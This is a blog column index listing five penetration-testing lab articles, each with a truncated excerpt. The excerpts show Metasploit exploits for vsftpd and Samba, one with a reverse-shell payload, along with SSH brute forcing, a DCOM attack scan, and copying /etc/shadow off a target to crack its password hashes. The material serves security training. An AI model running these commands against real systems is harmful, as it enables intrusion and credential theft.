
cyber security
xiadingling
天道酬勤
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
01.[21]vsftpd-linux
nmap -A 192.168.56.120 nmap -sV 192.168.56.120 msfconsole msf > search vsftpd msf > set RHOST 192.168.56.120 msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(unix/ftp/vsftpd_234_b...原创 2018-09-20 22:19:06 · 188 阅读 · 0 评论 -
02.Use john the ripper to crack password
cat /etc/passwd (target) -----> password.txt (kali) cat /etc/shadow (target) -----> shadow.txt (kali) --unshadow /usr/sbin/unshadow password.txt shadow.txt > cracked.txt --crack pwd /us...原创 2018-09-20 22:19:34 · 1526 阅读 · 0 评论 -
03.[445]samba-linux
msf > search samba msf > use exploit/multi/samba/usermap_script msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse msf exploit(multi/samba/usermap_script) > set RHOST ...原创 2018-09-20 22:20:03 · 630 阅读 · 0 评论 -
04.[22]Brute Force ssh_login
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.56.120 set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt set VERBOSE false msf auxiliary(scanner/ssh/ssh_lo...原创 2018-09-20 22:20:30 · 617 阅读 · 0 评论 -
05.[135-RPC]dcom-windows-2003
root@kali:~# nmap -A -sV 192.168.1.5 Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-23 21:33 EDT Nmap scan report for 192.168.1.5 Host is up (0.00016s latency). Not shown: 992 closed ports PORT ...原创 2018-09-20 22:21:00 · 594 阅读 · 0 评论